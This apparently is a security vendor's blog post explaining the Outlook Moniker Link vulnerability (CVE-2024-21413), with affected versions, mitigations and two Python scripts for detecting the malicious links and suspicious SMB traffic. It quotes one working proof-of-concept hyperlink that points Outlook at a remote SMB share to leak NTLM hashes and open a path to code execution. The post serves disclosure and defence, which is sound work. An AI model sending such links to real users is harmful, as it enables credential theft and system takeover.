Unveiling Moniker Link (CVE-2024-21413): Navigating The Latest Cybersecurity Landscape


An alarming new vulnerability has shaken the cybersecurity community. An intriguing flaw in Microsoft Outlook’s handling of specific hyperlink formats has been actively exploited in the wild, posing serious risks to individuals and organizations alike. This vulnerability — tracked as CVE-2024-21413 — carries a critical severity score of 9.8, underlining its potential to cause severe impact across enterprise environments.

In this blog, we will explore how this vulnerability works, its implications, the versions affected, and the necessary steps you can take to stay protected.

Background

In February 2024, Microsoft released a patch as part of its Patch Tuesday updates that addressed CVE-2024-21413. The issue revolves around how Microsoft Outlook processes certain types of hyperlinks — which, when improperly handled, allow an attacker to bypass Office Protected View.

Protected View is designed to open files in a restricted mode to prevent potential exploitation. However, if this flaw is successfully exploited, a threat actor could trick Outlook into opening a malicious file in editing mode, effectively neutralizing this security barrier.

Understanding CVE-2024-21413

According to research by Check Point, Outlook normally opens hyperlinks beginning with http:// or https:// through the system’s default browser. However, when alternate protocols, such as the skype:// URL scheme, are invoked, Outlook displays a warning alert before proceeding.

But this defense breaks down with certain protocols, such as file://. In these cases, Outlook does not show a proper security dialog. Instead, the Windows Notification Center only displays an error warning — while still attempting to process the link.

This opens the door to NTLM credential exposure. Simply clicking such a crafted hyperlink could leak local authentication hashes to an attacker-controlled server.

How The Attack Works

By making a subtle change to the file:// protocol link, researchers demonstrated that it’s possible to bypass the security restriction entirely. For instance, a link such as:

    <a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

can trigger Outlook to access a remote file — in this example, a “test.rtf” document hosted on a remote SMB share. When this happens, the SMB protocol exchanges NTLM authentication details, exposing the victim’s credentials.

Researchers also discovered that the vulnerability extends beyond simple credential theft. Using Windows’ COM (Component Object Model) and the Moniker Link mechanism, they managed to escalate the attack toward arbitrary code execution.

Outlook employs the API ole32!MkParseDisplayName() for parsing such Moniker Links. When it encounters a “!” character, the API interprets the link as a composite moniker, combining multiple moniker types (e.g., FileMoniker and ItemMoniker).

Technical Breakdown

To test the vulnerability, researchers combined:

  • FileMoniker pointing to \\10.10.111.111\test\test.rtf

  • ItemMoniker labeled as “something”

When a user clicks the link in Outlook, Windows triggers Microsoft Word as a COM server to open the referenced RTF file. However, since the attacker controls that remote RTF file, they can inject malicious payloads designed to execute through WINWORD.EXE, resulting in remote code execution (RCE) on the victim’s system.

This makes CVE-2024-21413 exceptionally dangerous — as it transforms a simple hyperlink click into a full-blown exploitation chain.
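For mail filtering, the link structure described above (a file: URL naming a remote host, with "!" separating the FileMoniker path from the ItemMoniker) can be checked in message HTML. The following is an added example, not code from Check Point's research or from Microsoft; the sample body is constructed, fs01.example is a placeholder host, and treating every non-drive-letter file: target as a UNC host is a simplifying assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

DRIVE = re.compile(r"^[A-Za-z]:")  # e.g. C:\..., a local path

class HrefCollector(HTMLParser):
    """Collect every href attribute value found on <a> tags."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]

def classify_href(href):
    """Return a finding dict for a remote file: link, else None."""
    url = unquote(href.strip())          # so an encoded '!' (%21) is not missed
    if not url.lower().startswith("file:"):
        return None
    # Treat '/' and '\' alike, then drop the leading separators.
    target = url[5:].replace("/", "\\").lstrip("\\")
    if not target or DRIVE.match(target):
        return None                      # local drive path, not a remote share
    host, _, rest = target.partition("\\")
    path, bang, item = rest.partition("!")
    return {"host": host, "path": path,
            "item": item if bang else None,
            "verdict": "moniker-link" if bang else "remote-file"}

def scan_html(body):
    """Return findings for every remote file: href in an HTML body."""
    collector = HrefCollector()
    collector.feed(body)
    return [f for f in map(classify_href, collector.hrefs) if f]

# Constructed sample body; the last link is the one quoted in the post.
SAMPLE = r'''<p><a href="https://example.com/report">Report</a>
<a href="file:///C:/Users/Public/readme.txt">Local</a>
<a href="file://fs01.example/share/q3.docx">Share</a>
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a></p>'''

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```

A "remote-file" verdict already covers the NTLM exposure case; "moniker-link" marks the composite form that the post ties to the Protected View bypass.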

Affected Versions

According to Microsoft’s official advisory, the following products are affected but now have patches available:

  • Microsoft Office 2016 (32-bit and 64-bit)

  • Microsoft Office LTSC 2021 (32-bit and 64-bit)

  • Microsoft Office 2019 (32-bit and 64-bit)
    (requires cumulative updates to remain patched)

  • Microsoft 365 Apps for Enterprise (32-bit and 64-bit)

Users running unpatched versions of any of the above remain at high risk.

Potential Impact

CVE-2024-21413 represents a severe, actively exploited zero-day in Outlook. Any individual or organization relying on Outlook for email communications could be targeted.

Key Risks Include:

  • Exposure of NTLM credentials, allowing lateral movement within networks

  • Execution of remote code, giving attackers control over victim systems

  • Bypassing of Protected View, undermining Office’s primary security safeguard

Given its exploitability and the fact that attacks were observed before Microsoft’s disclosure, this vulnerability underscores the need for timely patching and proactive defense.

Microsoft’s Response

Microsoft acted swiftly by releasing a fix during its February 2024 Patch Tuesday cycle. The patch addresses how Outlook handles file-based hyperlinks and prevents NTLM credential leakage.

However, simply patching is not enough — organizations must ensure that all endpoints, including older or less frequently updated systems, receive the update promptly. Even a single unpatched workstation could expose an entire corporate network.

Recommendations

To mitigate risks from CVE-2024-21413 and similar zero-day vulnerabilities, security professionals and users should:

  1. Install Microsoft’s February 2024 security updates immediately to patch Outlook and Office.

  2. Avoid clicking links in unsolicited or unexpected emails, even if they appear to come from known contacts.

  3. Disable automatic hyperlink handling in Outlook where possible.

  4. Implement email security solutions capable of scanning for malicious URLs and attachments.

  5. Monitor NTLM traffic and authentication logs to detect suspicious external connections.

  6. Educate users about zero-day threats and social engineering tactics.
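One way to act on recommendation 5, as an added example that is not part of the original post: flag SMB connections that Outlook or Word make to addresses outside the internal network. The records are constructed and modelled on Sysmon network-connection (Event ID 3) fields; the host names, addresses and the choice of RFC 1918 space as "internal" are assumptions.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network
from ntpath import basename  # parses Windows paths on any OS

OFFICE_IMAGES = {"outlook.exe", "winword.exe"}
SMB_PORTS = {139, 445}
# Assumption: RFC 1918 space is "internal"; replace with your own ranges.
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_external(ip):
    """True if the address is outside every internal network."""
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def find_external_smb(events):
    """Group Office-initiated SMB connections to external hosts
    by (computer, destination IP)."""
    hits = defaultdict(list)
    for ev in events:
        image = basename(ev["Image"]).lower()
        if (image in OFFICE_IMAGES
                and int(ev["DestinationPort"]) in SMB_PORTS
                and is_external(ev["DestinationIp"])):
            key = (ev["Computer"], ev["DestinationIp"])
            hits[key].append((ev["UtcTime"], image))
    return dict(hits)

OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
# Constructed events (documentation-range IPs stand in for external hosts).
EVENTS = [
    {"UtcTime": "2024-02-20 09:14:02", "Computer": "WS-014",
     "Image": OFFICE + r"\OUTLOOK.EXE", "DestinationIp": "203.0.113.77", "DestinationPort": "445"},
    {"UtcTime": "2024-02-20 09:14:03", "Computer": "WS-014",
     "Image": OFFICE + r"\WINWORD.EXE", "DestinationIp": "203.0.113.77", "DestinationPort": "445"},
    {"UtcTime": "2024-02-20 09:20:41", "Computer": "WS-020",
     "Image": OFFICE + r"\OUTLOOK.EXE", "DestinationIp": "10.20.0.5", "DestinationPort": "445"},
    {"UtcTime": "2024-02-20 09:21:10", "Computer": "WS-014",
     "Image": OFFICE + r"\OUTLOOK.EXE", "DestinationIp": "198.51.100.10", "DestinationPort": "443"},
    {"UtcTime": "2024-02-20 09:30:00", "Computer": "WS-031",
     "Image": r"C:\Windows\explorer.exe", "DestinationIp": "203.0.113.77", "DestinationPort": "445"},
]

if __name__ == "__main__":
    for (computer, dest), seen in find_external_smb(EVENTS).items():
        print(computer, "->", dest, seen)
```

Outlook followed by Word reaching the same external SMB host within seconds matches the sequence the post describes, where the clicked link causes Word to open the remote RTF file.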

Looking Ahead: Lessons from Moniker Link

The Moniker Link vulnerability is a stark reminder that even long-established applications like Microsoft Outlook can harbor hidden weaknesses. Zero-day exploits thrive on the assumption that users, and sometimes administrators, delay patching. A holistic security posture requires continuous vigilance, layered defense mechanisms, and a security-aware culture across the organization.

By understanding how CVE-2024-21413 operates and how it was weaponized, cybersecurity teams can strengthen their incident response plans and refine their vulnerability management strategies.

TL;DR
  • CVE-2024-21413 is a critical Outlook vulnerability allowing NTLM credential theft and potential remote code execution.

  • Severity: 9.8 (Critical)

  • Status: Patched in Microsoft’s February 2024 updates

  • Action: Update Outlook/Office immediately and practice email link hygiene.

Zero-day vulnerabilities like this remind us that proactive defense is the only real protection against an evolving cyber threat landscape. Staying informed, keeping systems updated, and working closely with cybersecurity professionals are vital to safeguarding your digital assets.

Redfox Security is a diverse network of expert security consultants with a global mindset and a collaborative culture. If you are looking to improve your organization’s security posture, contact us today to discuss your security testing needs. Our team of security professionals can help you identify vulnerabilities and weaknesses in your systems and provide recommendations to remediate them.
